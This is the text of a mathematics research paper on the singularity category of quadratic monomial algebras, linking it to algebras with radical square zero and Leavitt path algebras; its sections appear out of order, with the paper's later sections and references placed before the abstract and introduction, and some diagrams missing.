kQ of a finite quiver Q is defined as follows. As a k-vector space, it has a basis given by all the paths in Q. For two paths p and q, their multiplication is given by the concatenation pq if s(p)=t(q), and it is zero, otherwise. The unit of kQ equals ∑i∈Q0ei. Denote by J the two-sided ideal of kQ generated by arrows. Then Jd is spanned by all the paths of length at least d for each d≥2. A two-sided ideal I of kQ is admissible provided that Jd⊆I⊆J2 for some d≥2. In this case, the quotient algebra A=kQ/I is finite-dimensional. We recall that an admissible ideal I of kQ is quadratic monomial provided that it is generated by some paths of length two. In this case, the quotient algebra A=kQ/I is called a quadratic monomial algebra. Observe that the algebra A is with radical square zero if and only if I=J2. We call kQ/J2 the algebra with radical square zero defined by the quiver Q. In what follows, A=kQ/I is a quadratic monomial algebra. We denote by F the set of paths of length two contained in I. Following [29], a path p in Q is non-zero in A provided that it does not belong to I, or equivalently, p does not contain a sub-path in F. In this case, we abuse the image p+I in A with p. The set of non-zero paths forms a k-basis for A. For a path p in I, we write p=0 in A. For a non-zero path p, we consider the left ideal Ap generated by p, which has a k-basis given by the non-zero paths q such that q=q′p for some path q′. We observe that for a vertex i, Aei is an indecomposable projective A-module. Then we have a projective cover πp:Aet(p)→Ap sending et(p) to p. Lemma 4.1 Let A=kQ/Ibe a quadratic monomial algebra. Then the following statements hold: For a non-zero path p=αp′with αan arrow, there is an isomorphism Ap≃Aαof A-modules sending xpto xαfor any path xwith s(x)=t(p). For an arrow α, we have a short exact sequence of A-modules 0⟶⨁{β∈Q1∣βα∈F}Aβ⟶incAet(α)⟶παAα⟶0, (4.1)where ‘ inc’ denotes the inclusion map. For any A-module M, there is an isomorphism ΩA2(M)≃⨁α∈Q1(Aα)nαfor some integers nα. Proof (1) is trivial and (2) is straightforward; compare the first paragraph in [29, p. 162]. In view of (1), the statement (3) is a special case of [29, Theorem I].□ Let α be an arrow such that the set {β∈Q1∣βα∈F} is non-empty. By (4.1), this is equivalent to the condition that the A-module Aα is non-projective. Denote by N(α)={α′∈Q1∣t(α′)=t(α),βα′∈Fforeacharrowβsatisfyingβα∈F}. Set Z(α)=⨁α′∈N(α)α′A, which is the right ideal generated by N(α). We observe that α∈N(α). The second statement of the following result is analogous to [12, Lemma 2.3]. Lemma 4.2 Let α,α′be two arrows. We assume that the set {β∈Q1∣βα∈F}is non-empty. Then we have the following statements: There is an isomorphism HomA(Aα,A)→Z(α)sending fto f(α). There is a k-linear isomorphism Hom̲A(Aα,Aα′)=Z(α)∩Aα′Z(α)α′. (4.2) If α′does not belong to N(α), we have Hom̲A(Aα,Aα′)=0. If α′belongs to N(α), there is a unique epimorphism π=πα,α′:Aα→Aα′sending αto α′and Hom̲A(Aα,Aα′)=kπ¯. Proof We observe that Z(α) has a k-basis given by non-zero paths q which satisfy t(q)=t(α) and βq=0 for each arrow β with βα∈F. Then we infer (1) by applying HomA(−,A) to (4.1) and using the canonical isomorphism HomA(Aet(α),A)≃et(α)A. For (2), we identify for each left ideal K of A, HomA(Aα,K) with the subspace of HomA(Aα,A) formed by those morphisms whose image is contained in K. Therefore, we identify HomA(Aα,Aα′) with Z(α)∩Aα′, HomA(Aα,Aet(α′)) with Z(α)∩Aet(α′). Recall the projective cover πα′:Aet(α′)→Aα′. The subspace p(Aα,Aα′) formed by those morphisms factoring through projective modules equals the image of the map HomA(πα′,A). This image is then identified with Z(α)α′. Then the required isomorphism follows. The statement (3) is an immediate consequence of (2), since in this case we have Z(α)∩Aα′=Z(α)α′. For (4), we observe in this case that Z(α)∩Aα′=(Z(α)α′)⊕kα′. It follows from (3) that Hom̲A(Aα,Aα′) is one dimensional. The existence of the surjective homomorphism π is by the isomorphism in (1), under which π corresponds to the element α′. Then we are done.□ Remark 4.3 Assume that α′∈N(α). In particular, t(α)=t(α′). Then we have the following commutative diagram: The leftmost inclusion uses the fact that α′∈N(α), and thus {β∈Q1∣βα∈F}⊆{β∈Q1∣βα′∈F}. The following notion is taken from [12, Section 5]; compare [17]. Definition 4.4 Let A=kQ/I be a quadratic monomial algebra. Denote by F the set consisting of paths in Q, that are of length two and contained in I. The relation quiver RA of A is defined as follows. Its vertices are given by arrows in Q, and there is an arrow [βα] from α to β for each element βα in F. We will consider the algebra B=kRA/J2 with radical square zero defined by RA. The main result of this paper is as follows. Theorem 4.5 Let A=kQ/Ibe a quadratic monomial algebra, and let B=kRA/J2be the algebra with radical square zero defined by the relation quiver of A. Then there is a pre-triangle quasi-equivalence connecting A-mod̲and B-mod̲. Consequently, there is a singular equivalence between Aand B. For an arrow α in Q, we denote by Sα and Pα the simple B-module and the indecomposable projective B-module corresponding to the vertex α, respectively. We may identify Pα with Beα, where eα denotes the trivial path in RA at α. Hence, the B-module Pα has a k-basis {eα,[βα]∣βα∈F}. We observe the following short exact sequence of B-modules 0⟶⨁{β∈Q1∣βα∈F}Sβ⟶iαPα⟶Sα⟶0, (4.3) where iα identifies Sβ with the B-submodule k[βα]. We denote by B-ssmod̲ the full subcategory of B-mod̲ consisting of semisimple B-modules. We observe that for any B-module M, the syzygy ΩB(M) is semisimple; compare [11, Lemma 2.1]. Moreover, any homomorphism f:X→Y between semisimple modules splits, that is, it is isomorphic to a homomorphism of the form (00IdZ0):K⊕Z→C⊕Z for some B-modules K, C and Z. We infer that B-ssmod̲⊆B-mod̲ is a left triangulated subcategory. Moreover, all left triangles inside B-ssmod̲ are direct sums of trivial ones. There is a unique k-linear functor F:B-ssmod̲→A-mod̲ sending Sα to Aα for each arrow α in Q. Here, for the well-definedness of F, we use the following fact, which can be obtained by comparing (4.1) and (4.3): the simple B-module Sα is projective if and only if so is the A-module Aα. We have the following key observation. Lemma 4.6 The functor F:B-ssmod̲→A-mod̲is a pre-triangle equivalence. Proof Let α be an arrow in Q. We observe that (4.1) and (4.3) compute the syzygies modules ΩA(Aα) and ΩB(Sα), respectively. It follows that the functor F commutes with the syzygy functors. In other words, there is a natural isomorphism δ:FΩA→ΩBF such that (F,δ) is a looped functor. Since all morphisms in B-ssmod̲ split, each left triangle inside is a direct sum of trivial ones. It follows that F respects left triangles, that is, (F,δ) is a triangle functor. We verify the conditions (S1)–(S3) in Proposition 2.2. Then we are done. Since the functor F is faithful, (S2) follows. The condition (S3) follows from Lemma 4.1(3). For (S1), we take a morphism g:F(X)→F(Y) in A-mod̲. Without loss of generality, we assume that both X and Y are indecomposable, in which case both are simple B-modules. We assume that X=Sα and Y=Sα′. We assume that g is non-zero, in particular, F(X)=Aα is non-projective, or equivalently, the set {β∈Q1∣βα∈F} is non-empty. Observe that F(Y)=Aα′. We apply Lemma 4.2(3) to infer that α′∈N(α). Write π=πα,α′. By Lemma 4.2(4), we may assume that g=π¯. The commutative diagram in Remark 4.3 implies that ΩA(g) equals the inclusion morphism ⨁{β∈Q1∣βα∈F}Aβ⟶⨁{β∈Q1∣βα′∈F}Aβ. Take f to be the corresponding inclusion morphism ΩB(Sα)=⨁{β∈Q1∣βα∈F}Sβ⟶ΩB(Sα′)=⨁{β∈Q1∣βα′∈F}Sβ in B-ssmod̲. Then we identify F(f) with ΩA(g); more precisely, we have F(f)=δY◦ΩA(g)◦(δX)−1. This proves the condition (S1).□ We now prove Theorem 4.5. Proof of Theorem4.5. Consider the inclusion functor inc:B-ssmod̲→B-mod̲. As mentioned above, this is a triangle functor. Recall that the syzygy of any B-module is semisimple, that is, it lies in B-ssmod̲. Then the inclusion functor is a pre-triangle equivalence by Corollary 2.3. Recall the pre-triangle equivalence F:B-ssmod̲→A-mod̲ in Lemma 4.6. Then we have the required pre-triangle quasi-equivalence A-mod̲⟵FB-ssmod̲⟶incB-mod̲. The last statement follows from Proposition 3.2. We mention that by the explicit construction of the functor F, the resulting triangle equivalence Dsg(A)→Dsg(B) sends Aα to Sα for each arrow α in Q.□ Remark 4.7 We will observe in the proof of Proposition 5.3 below that the singular equivalence in Theorem 4.5 restricts to a triangle equivalence between A-Gproj̲ and B-Gproj̲. Consequently, it induces a triangle equivalence between Ddef(A) and Ddef(B). We emphasize that in general a singular equivalence will not induce a triangle equivalence between Gorenstein defect categories. 5. Consequences and examples In this section, we draw some consequences of Theorem 4.5 and describe some examples. We first make some preparation by recalling some known results on the singularity category of an algebra with radical square zero. For a finite quiver Q, we recall that a vertex in Q is a sink if there is no arrow starting at it. We denote by Q0 the quiver without sinks, that is obtained from Q by repeatedly removing sinks. The double quiver Q¯ of Q is obtained from Q by adding for each α∈Q1 a new arrow α* in the reverse direction, that is, s(α*)=t(α) and t(α*)=s(α). Recall that the Leavitt path algebra L(Q) of Q with coefficients in k is the quotient algebra of kQ¯ modulo the two-sided ideal generated by the following elements: {αβ*−δα,βet(α)∣α,β∈Q1}∪{∑{α∈Q1∣s(α)=i}α*α−ei∣i∈Q0non-sink}. Here, δ denotes the Kronecker symbol. Then L(Q) has a natural Z-grading by degei=0degα=1 and degα*=−1. We denote by L(Q)-grproj the category of finitely generated Z-graded left L(Q)-modules, and by (−1):L(Q)-grproj→L(Q)-grproj the degree-shift functor by degree −1. For details on Leavitt path algebras, we refer to [1, 13, 27]. We denote by kQ/J2 the algebra with radical square zero defined by Q. For n≥1, we denote by Zn the basic n-cycle, which is a connected quiver consisting of n vertices and n arrows which form an oriented cycle. Then the algebra kZn/J2 is self-injective. In particular, the stable module category kZn/J2-mod̲ is triangle equivalent to Dsg(kZn/J2). An abelian category A is semisimple if any short exact sequence splits. For example, if the quiver Q has no sinks, the category L(Q)-grproj is a semisimple abelian category; see [13, Lemma 4.1]. For a semisimple abelian category A and an auto-equivalence Σ on A, there is a unique triangulated structure on A with Σ the translation functor. Indeed, all triangles are direct sums of trivial ones. The resulting triangulated category is denoted by (A,Σ); see [10, Lemma 3.4]. As an example, we will consider the triangulated category (L(Q)-grproj,(−1)) for a quiver Q without sinks. Example 5.1 Let kn=k×k×⋯×k be the product algebra of n copies of k. Consider the automorphism σ:kn→kn sending (a1,a2,…,an) to (a2,…,an,a1), which induces an automorphism σ*:kn-mod→kn-mod by twisting the kn-action on modules. We observe that there are triangle equivalences (kn-mod,σ*)⟶∼kZn/J2-mod̲⟶∼(L(Zn)-grproj,(−1)). The first equivalence is well known and the second one is a special case of [13, Theorem 6.1]. We will denote this triangulated category by Tn. Let Q be a finite quiver. We call a connected component C of Qperfect (resp. acyclic) if it is a basic cycle (resp. it has no oriented cycles). A connected component is defect if it is neither perfect nor acyclic. Then we have a disjoint union Q=Qperf∪Qac∪Qdef, where Qperf (resp. Qac, Qdef) is the union of all the perfect (resp. acyclic, defect) components in Q. Denote by B=kQ/J2. Then we have a decomposition of algebras B=Bperf×Bac×Bdef. We summarize the known results on the singularity category and the Gorenstein defect category of an algebra with radical square zero. Lemma 5.2 Keep the notation as above. Then the following statements hold: There is a triangle equivalence Dsg(B)≃Bperf-mod̲×Dsg(Bdef). There is a triangle equivalence B-Gproj̲≃Bperf-mod̲, which is triangle equivalent to a product of categories Tn. There is a triangle equivalence Ddef(B)≃Dsg(Bdef), which is triangle equivalent to (L((Qdef)0)-grproj,(−1)). Proof We observe that the algebra Bperf is self-injective and that Bac has finite global dimension. Then (1) is a consequence of the decomposition Dsg(B)=Dsg(Bperf)×Dsg(Bac)×Dsg(Bdef) of categories. For (2), we note that any Bperf-module is Gorenstein-projective and that a Gorenstein-projective Bac-module is necessarily projective. By [11, Theorem 1.1] any Gorenstein-projective Bdef-module is projective. Then (2) follows by a similar decomposition of B-Gproj̲. The last statement follows from Example 5.1, since Bperf is isomorphic to a product of algebras of the form kZn/J2. By (1) and (2), the functor GB:B-Gproj̲→Dsg(B) is identified with the inclusion. The required triangle equivalence in (3) follows immediately. The last sentence follows by combining [10, Proposition 4.2] and [13, Theorem 6.1]; compare [10, Theorem B] and [27, Theorem 5.9].□ In what follows, let A=kQ/I be a quadratic monomial algebra with RA its relation quiver. We denote by {C1,C2,…,Cm} the set of all the perfect components in RA, and by di the number of vertices in the basic cycle Ci. Let B=kRA/J2 be the algebra with radical square zero defined by RA. We consider the triangle equivalence Φ:Dsg(A)→Dsg(B) obtained in Theorem 4.5. We identify the fully faithful functors GA and GB as inclusions. The following result describes the singularity category and the Gorenstein defect category of a quadratic monomial algebra. We mention that the equivalence in Proposition 5.3(2) is due to [12, Theorem 5.7], which is obtained by a completely different method. Proposition 5.3 The triangle equivalence Φ:Dsg(A)→Dsg(B)restricts to a triangle equivalence A-Gproj̲→∼B-Gproj̲, and thus induces a triangle equivalence Ddef(A)→∼Ddef(B). Consequently, we have the following triangle equivalences: Dsg(A)→∼A-Gproj̲×Ddef(A); A-Gproj̲→∼Bperf-mod̲→∼Td1×Td2×⋯×Tdm; Ddef(A)→∼Dsg(Bdef)→∼(L(Q′)-grproj,(−1)) with Q′=(RAdef)0. Proof Recall from the proof of Theorem 4.5 that Φ(Aα)=Sα for each arrow α in Q. By [12, Lemma 5.4(1)] the A-module Aα is non-projective Gorenstein-projective if and only if α, as a vertex, lies in a perfect component of RA. Moreover, any indecomposable non-projective Gorenstein-projective A-module arises in this way. On the other hand, any indecomposable non-projective Gorenstein-projective B-module is of the form Sα with α in RAperf; see Lemma 5.2(2). It follows that the equivalence Φ restricts to the equivalence A-Gproj̲→∼B-Gproj̲. The three triangle equivalences follow immediately from the equivalences in Lemma 5.2.□ We end the paper with examples on Proposition 5.3. Example 5.4 Let A be a quadratic monomial algebra which is Gorenstein. By [12, Proposition 5.5(1)], this is equivalent to the condition that the relation quiver RA has no defect components. For example, a gentle algebra is such an example. Note that Ddef(A) is trivial. Then we obtain a triangle equivalence Dsg(A)⟶∼Td1×Td2×⋯×Tdm, where di’s denote the sizes of the perfect components of RA. This result extends [20, Theorem 2.5(b)]; see also [8]. Example 5.5 Let A=k⟨x,y⟩/I be the quotient algebra of the free algebra k⟨x,y⟩ by the ideal I=(x2,y2,yx). Then the relation quiver RA is as follows: The relation quiver has no perfect components. Then we have triangle equivalences Dsg(A)≃Ddef(A)≃(L(RA)-grproj,(−1)). Example 5.6 Consider the following quiver Q and the algebra A=kQ/I with I=(βα,αβ,δγ,γδ,δξ): Its relation quiver RA is as follows: There are one perfect component and one defect component; moreover, we observe (RAdef)0=Z2. Then we have triangle equivalences A-Gproj̲≃T2 and Ddef(A)≃(L(Z2)-grproj,(−1)), which is equivalent to T2; see Example 5.1. Therefore, we have a triangle equivalence Dsg(A)≃T2×T2. Acknowledgements The author thanks the referee for many useful comments, and thanks Dawei Shen and Dong Yang for helpful discussions. The author still remembers that Professor Ragnar-Olaf Buchweitz sent a copy of the masterpiece [7] to him around 10 years ago. Funding This work is supported by the National Natural Science Foundation of China (Nos. 11522113 and 11671245) and the Fundamental Research Funds for the Central Universities. References 1 G. Abrams and G. Aranda Pino , The Leavitt path algebra of a graph , J. Algebra 293 ( 2005 ), 319 – 334 . Google Scholar CrossRef Search ADS 2 M. Auslander and M. Bridger , Stable module theory , Mem. Amer. Math. Soc. 29 ( 1997 ), 246 – 248 . 3 M. Auslander , I. Reiten and S. O. Smalø , Representation Theory of Artin Algebras, Cambridge Studies in Adv. Math. 36 , Cambridge University Press , Cambridge , 1995 . 4 A. Beligiannis , The homological theory of contravariantly finite subcategories: Auslander–Buchweitz contexts, Gorenstein categories and (co-)stabilization , Commun. Algebra 28 ( 2000 ), 4547 – 4596 . Google Scholar CrossRef Search ADS 5 A. Beligiannis and M. Marmaridis , Left triangulated categories arising from contravariantly finite subcategories , Commun. Algebra 22 ( 1994 ), 5021 – 5036 . Google Scholar CrossRef Search ADS 6 P. A. Bergh , D. A. Jorgensen and S. Oppermann , The Gorenstein defect category , Quart. J. Math. 66 ( 2015 ), 459 – 471 . Google Scholar CrossRef Search ADS 7 R. O. Buchweitz , Maximal Cohen–Macaulay Modules and Tate Cohomology over Gorenstein Rings, Unpublished Manuscript, 1987 . Available at: http://hdl.handle.net/1807/16682. 8 X. Chen , S. Geng and M. Lu , The singularity categories of the cluster-tilted algebras of Dynkin type , Algebr. Represent. Theor. 18 ( 2015 ), 532 – 554 . 9 X. W. Chen , Singularity categories, Schur functors and triangular matrix rings , Algebr. Represent. Theor. 12 ( 2009 ), 181 – 191 . Google Scholar CrossRef Search ADS 10 X. W. Chen , The singularity category of an algebra with radical square zero , Doc. Math. 16 ( 2011 ), 921 – 936 . 11 X. W. Chen , Algebras with radical square zero are either self-injective or CM-free , Proc. Amer. Math. Soc. 140 ( 2012 ), 93 – 98 . 12 X. W. Chen , D. Shen and G. Zhou , The Gorenstein-projective modules over a monomial algebra, arXiv:1501.02978, Proc. Royal Soc. Edin. Sect. A Math., accepted for publication. 13 X. W. Chen and D. Yang , Homotopy categories, Leavitt path algebras and Gorenstein projective modules , Inter. Math. Res. Not. 10 ( 2015 ), 2597 – 2633 . 14 D. Happel , Triangulated Categories in the Representation Theory of Finite Dimensional Algebras, London Math. Soc., Lecture Notes Ser. 119, Cambridge University Press, Cambridge, 1988 . 15 D. Happel , On Gorenstein algebras, In: Progress in Math. 95, Birkhäuser Verlag, Basel, 1991 , 389–404. 16 A. Heller , Stable homotopy categories , Bull. Amer. Math. Soc. 74 ( 1968 ), 28 – 63 . Google Scholar CrossRef Search ADS 17 C. Holdaway and S. P. Smith , An equivalence of categories for graded modules over monomial algebras and path algebras of quivers , J. Algebra 353 ( 2012 ), 249 – 260 . Corrigendum, J. Algebra 357 (2012) 319–321. Google Scholar CrossRef Search ADS 18 M. Hoshino , Algebras of finite self-injective dimension , Proc. Amer. Math. Soc. 112 ( 1991 ), 619 – 622 . Google Scholar CrossRef Search ADS 19 T. Howard , Complexity classes of modules over finite dimensional algebras , J. Pure Appl. Algebra 219 ( 2015 ), 5195 – 5205 . Google Scholar CrossRef Search ADS 20 M. Kalck , Singularity categories of gentle algebras , Bull. London Math. Soc. 47 ( 2015 ), 65 – 74 . Google Scholar CrossRef Search ADS 21 B. Keller and D. Vossieck , Sous les catégories dérivées , C.R. Acad. Sci. Paris, t. 305 Série I ( 1987 ), 225 – 228 . 22 D. Orlov , Triangulated categories of singularities and D-branes in Landau–Ginzburg models , Trudy Steklov Math. Inst. 204 ( 2004 ), 240 – 262 . 23 C. Psaroudakis , O. Skartsaterhagen and O. Solberg , Gorenstein categories, singular equivalences and finite generation of cohomology rings in recollements , Trans. Amer. Math. Soc. Ser. B 1 ( 2014 ), 45 – 95 . Google Scholar CrossRef Search ADS 24 D. Quillen , Higher algebraical K-theory I, Springer Lecture Notes in Math. 341, 1973 , 85–147. 25 J. Rickard , Derived categories and stable equivalence , J. Pure Appl. Algebra 61 ( 1989 ), 303 – 317 . Google Scholar CrossRef Search ADS 26 D. Shen , The singularity category of a Nakayama algebra , J. Algebra 429 ( 2015 ), 1 – 18 . Google Scholar CrossRef Search ADS 27 S. P. Smith , Equivalence of categories involving graded modules over path algebras of quivers , Adv. Math. 230 ( 2012 ), 1780 – 1810 . Google Scholar CrossRef Search ADS 28 M. Tierney , Categorical Constructions in Stable Homotopy Theory, Lecture Notes in Math. 87, Springer-Verlag, Berlin, Heidelberg, New York, 1969 . 29 B. Zimmermann Huisgen , Predicting syzygies over monomial relation algebras , Manu. Math. 70 ( 1991 ), 157 – 182 . Google Scholar CrossRef Search ADS 30 A. Zimmermann and G. Zhou , On singular equivalences of Morita type , J. Algebra 385 ( 2013 ), 64 – 79 . Google Scholar CrossRef Search ADS © The Author(s) 2018. Published by Oxford University Press. All rights reserved. For permissions, please e-mail: journals.permissions@oup.com This article is published and distributed under the terms of the Oxford University Press, Standard Journals Publication Model (https://academic.oup.com/journals/pages/about_us/legal/notices) http://www.deepdyve.com/assets/images/DeepDyve-Logo-lg.png The Quarterly Journal of Mathematics Oxford University Press The singularity category of a quadratic monomial algebra , Volume Advance Article – Mar 12, 2018 19 pages Loading next page... /lp/ou_press/the-singularity-category-of-a-quadratic-monomial-algebra-gtV9pr5FFS Publisher Oxford University Press Copyright © The Author(s) 2018. Published by Oxford University Press. All rights reserved. For permissions, please e-mail: journals.permissions@oup.com ISSN 0033-5606 eISSN 1464-3847 D.O.I. 10.1093/qmath/hay006 Publisher site See Article on Publisher Site Abstract Abstract We exploit singular equivalences between artin algebras that are induced from certain functors between the stable module categories. Such functors are called pre-triangle equivalences. We construct two pre-triangle equivalences connecting the stable module category over a quadratic monomial algebra to the one over an algebra with radical square zero. Consequently, we obtain an explicit singular equivalence between the two algebras. It turns out that this singular equivalence restricts to a triangle equivalence between their stable categories of Gorenstein-projective modules, and thus induces a triangle equivalence between their Gorenstein defect categories. 1. Introduction Let A be an artin algebra. The singularity category Dsg(A) of A is introduced in [7] under the name ‘the stable derived category’. The terminology is justified by the following fact: the algebra A has finite global dimension if and only if the singularity category Dsg(A) is trivial. Hence, the singularity category provides a homological invariant for algebras of infinite global dimension. The singularity category captures the stable homological property of an algebra. More precisely, certain information of the syzygy endofunctor on the stable A-module category is encoded in Dsg(A). Indeed, as observed in [21], the singularity category is equivalent to the stabilization of the pair that consists of the stable module category and the syzygy endofunctor on it; see also [4]. This fact is used in [10] to describe the singularity category of an algebra with radical square zero. We mention that related results appear in [19, 26]. By the fundamental result in [7], the stable category of Gorenstein-projective A-modules might be viewed as a triangulated subcategory of Dsg(A). Moreover, if the algebra A is Gorenstein, the two categories are triangle equivalent. We mention that the study of Gorenstein-projective modules goes back to [2] under the name ‘modules of G-dimension zero’. The Verdier quotient triangulated category Ddef(A) of Dsg(A) by the stable category of Gorenstein-projective A-modules is called the Gorenstein defect category of A in [6]. This terminology is justified by the fact that the algebra A is Gorenstein if and only if the category Ddef(A) is trivial. In other words, the Gorenstein defect category measures how far the algebra is from being Gorenstein. By a singular equivalence between two algebras, we mean a triangle equivalence between their singularity categories. We observe that a derived equivalence implies a singular equivalence. However, the converse is not true; for such examples, see [9, 23]. In general, a singular equivalence does not induce a triangle equivalence between Gorenstein defect categories. We mention the work [30], where a class of nice singular equivalences are studied. The aim of this paper is to study the singularity category of a quadratic monomial algebra. The main ingredient is the following observation: for two algebras, a certain functor between their stable module categories induces a singular equivalence after the stabilization. We call such a functor a pre-triangle equivalence between the stable module categories. More generally, the two stable module categories are called pre-triangle quasi-equivalent provided that there is a zigzag of pre-triangle equivalences connecting them. In this case, we also have a singular equivalence. The main result Theorem 4.5 claims a pre-triangle quasi-equivalence between the stable module category of a quadratic monomial algebra and the one of an algebra with radical square zero. Combining this with the results in [10, 13, 27], we describe the singularity category of a quadratic monomial algebra via the category of finitely generated graded projective modules over the Leavitt path algebra of a certain quiver; see Proposition 5.3. We mention that this description extends the result in [20] on the singularity category of a gentle algebra; see also [8, 12]. The paper is organized as follows. In Section 2, we recall the stabilization of a looped category. We introduce the notion of a pre-stable equivalence between looped categories, which is a functor between looped categories that induces an equivalence after the stabilization. A pre-stable equivalence in the left triangulated case is called a pre-triangle equivalence, which induces a triangle equivalence after the stabilization. In Section 3, we recall the result in [21] which states that the singularity category of an algebra is triangle equivalent to the stabilization of the stable module category. Therefore, a pre-triangle equivalence between stable module categories induces a singular equivalence; see Proposition 3.2 and compare Proposition 3.6. We include explicit examples of pre-triangle equivalences between stable module categories. In Section 4, we associate an algebra B with radical square zero to a quadratic monomial algebra A; compare [12]. We construct explicitly two pre-triangle equivalences connecting the stable A-module category to the stable B-module category. Then we obtain the required singular equivalence between A and B; see Theorem 4.5. In Section 5, we combine Theorem 4.5 with the results in [10, 13, 27] on the singularity category of an algebra with radical square zero. We describe the singularity category and the Gorenstein defect category of a quadratic monomial algebra via the categories of finitely generated graded projective modules over Leavitt path algebras of certain quivers; see Proposition 5.3. We discuss some concrete examples at the end. 2. The stabilization of a looped category In this section, we recall the construction of the stabilization of a looped category. The basic references are [16, Chapter I], [28, Section 1], [21] and [4, Section 3]. Following [4], a looped category (C,Ω) consists of a category C with an endofunctor Ω:C→C, called the loop functor. The looped category (C,Ω) is said to be stable if the loop functor Ω is an auto-equivalence on C, while it is strictly stable if Ω is an automorphism. By a looped functor (F,δ) between two looped categories (C,Ω) and (D,Δ), we mean a functor F:C→D together with a natural isomorphism δ:FΩ→ΔF. For a looped functor (F,δ), we define inductively for each i≥1 a natural isomorphism δi:FΩi→ΔiF such that δ1=δ and δi+1=Δiδ◦δiΩ. Set δ0 to be the identity transformation on F, where Ω0 and Δ0 are defined to be the identity functors. We say that a looped functor (F,δ):(C,Ω)→(D,Δ) is strictly looped provided that FΩ=ΔF as functors and δ is the identity transformation on FΩ. In this case, we write (F,δ) as F; compare [16, 1.1]. Let (C,Ω) be a looped category. We define a category S=S(C,Ω) as follows. The objects of S are pairs (X,n) with X an object in C and n∈Z. The Hom-set is defined by the following formula: HomS((X,n),(Y,m))=colimHomC(Ωi−n(X),Ωi−m(Y)), (2.1) where i runs over all integers satisfying i≥n and i≥m. An element f in HomS((X,n),(Y,m)) is said to have an ith representative fi:Ωi−n(X)→Ωi−m(Y) provided that the canonical image of fi equals f. The composition of morphisms in S is induced by the one in C. We observe that Ω˜:S→S sending (X,n) to (X,n−1) is an automorphism. Then we have a strictly stable category (S,Ω˜). There is a canonical functor S:C→S sending X to (X,0), and a morphism f to S(f) whose 0th representative is f. For an object X in C, we have a natural isomorphism θX:(ΩX,0)⟶(X,−1), whose 0th representative is IdΩX. Indeed, this yields a looped functor (S,θ):(C,Ω)⟶(S,Ω˜). This process is called in [16] the stabilization of the looped functor (C,Ω). We mention that S:C→S is an equivalence if and only if (C,Ω) is a stable category, in which case we identify (C,Ω) with (S,Ω˜). The stabilization functor (S,θ) enjoys a universal property; see [16, Proposition 1.1]. Let (F,δ):(C,Ω)→(D,Δ) be a looped functor with (D,Δ) a strictly stable category. We denote by Δ−1 the inverse of Δ. Then there is a unique functor F˜:(S,Ω˜)→(D,Δ) which is strictly looped satisfying F=F˜S and δ=F˜θ. The functor F˜ sends (X,n) to Δ−nF(X). For a morphism f:(X,n)→(Y,m) whose ith representative is given by fi:Ωi−n(X)→Ωi−m(Y), we have F˜(f)=Δ−i((δYi−m)◦F(fi)◦(δXi−n)−1):Δ−nF(X)⟶Δ−mF(Y). (2.2) Lemma 2.1 Keep the notation as above. Then the functor F˜:(S,Ω˜)→(D,Δ)is an equivalence if and only if the following conditions are satisfied: for any morphism g:F(X)→F(Y)in D, there exist i≥0and a morphism f:Ωi(X)→Ωi(Y)in Csatisfying Δi(g)=δYi◦F(f)◦(δXi)−1; for any two morphisms f,f′:X→Yin Cwith F(f)=F(f′), there exists i≥0such that Ωi(f)=Ωi(f′); for any object Zin D, there exist i≥0and an object Xin Csatisfying Δi(Z)≃F(X). Proof Indeed, the above three conditions are equivalent to the statements that F˜ is full, faithful and dense, respectively. We refer to [28, 1.2 Proposition] for the details and compare [4, Proposition 3.4].□ We now apply Lemma 2.1 to a specific situation. Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Consider the composition (C,Ω)⟶(F,δ)(C′,Ω′)⟶(S,θ)(S(C′,Ω′),Ω˜′). (2.3) By the universal property of the stabilization, there is a unique strictly looped functor S(F,δ):(S(C,Ω),Ω˜)→(S(C′,Ω′),Ω˜′) making the following diagram commutative: We call the functor S(F,δ) the stabilization of (F,δ). Proposition 2.2 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor. Then its stabilization S(F,δ)is an equivalence if and only if the following conditions are satisfied: (S1) for any morphism g:F(X)→F(Y)in C′, there exist i≥0and a morphism f:Ωi(X)→Ωi(Y)in Csatisfying Ω′i(g)=δYi◦F(f)◦(δXi)−1; (S2) for any two morphisms f,f′:X→Yin Cwith F(f)=F(f′), there exists i≥0such that Ωi(f)=Ωi(f′); (S3) for any object C′in C′, there exist i≥0and an object Xin Csatisfying Ω′i(C′)≃F(X). The looped functor (F,δ) is called a pre-stable equivalence if it satisfies (S1)–(S3). The result implies that a pre-stable equivalence induces an equivalence between the stabilized categories. Proof Write (D,Δ)=(S(C′,Ω′),Ω˜′) and F˜=S(F,δ). Write the composition (2.3) as (SF,∂). Then for an object X in C, the morphism ∂X:SFΩ(X)→Ω˜′SF(X) equals θFX◦S(δX). We make the following observation: for a morphism f:Ωl(X)→Ωl(Y) in C, the morphism ∂Yl◦SF(f)◦(∂Xl)−1 has a 0th representative δYl◦F(f)◦(δXl)−1. We claim that for each 1≤i≤3, the condition ( Si) for (F,δ) is equivalent to the condition ( i) in Lemma 2.1 for (SF,∂). Then we are done by Lemma 2.1. In what follows, we only prove that ( Si) implies ( i). By reversing the argument, we obtain the converse implication. Assume that (S1) for (F,δ) holds. We take a morphism g:SF(X)=(FX,0)→SF(Y)=(FY,0) in D. We assume that g has a jth representative gj:Ω′jF(X)→Ω′jF(Y). Consider the morphism h:F(ΩjX)→F(ΩjY) by h=(δYj)−1◦gj◦δXj. Then by (S 1), there exist i≥0 and a morphism f:Ωi+j(X)→Ωi+j(Y) satisfying Ω′i(h)=(δΩjYi)◦F(f)◦(δΩjXi)−1. Then we have Δi+j(g)=∂Yi+j◦SF(f)◦(∂Xi+j)−1. Here, we use the observation above and the fact that Δi+j(g) has a 0th representative Ω′i(gj). The we have (1) for (SF,∂). Assume that (S2) for (F,δ) holds. We take two morphisms f,f′:X→Y in C with SF(f)=SF(f′). Then there exists j≥0 such that Ω′jF(f)=Ω′jF(f′). Using the natural isomorphism δj, we infer that FΩj(f)=FΩj(f′). By (S2), there exists i≥0 such that Ωi+j(f)=Ωi+j(f′), proving (2) for (SF,∂). Assume that (S3) for (F,δ) holds. We take any object (C′,n) in (D,Δ). We may assume that n≥0. Otherwise, we use the isomorphism θC′−n:((Ω′)−n(C′),0)≃(C′,n). By (S3), there exist j≥0 and an object X in C satisfying Ω′j(C′)≃F(X). We observe that Δj+n(C′,n)=(C′,−j), which is isomorphic to SΩ′j(C′), which is further isomorphic to SF(X). Set i=j+n. Then we have the required isomorphism Δi(C′,n)≃SF(X) in (3) for (SF,∂). This completes the proof of the claim.□ We make an easy observation. Corollary 2.3 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor. 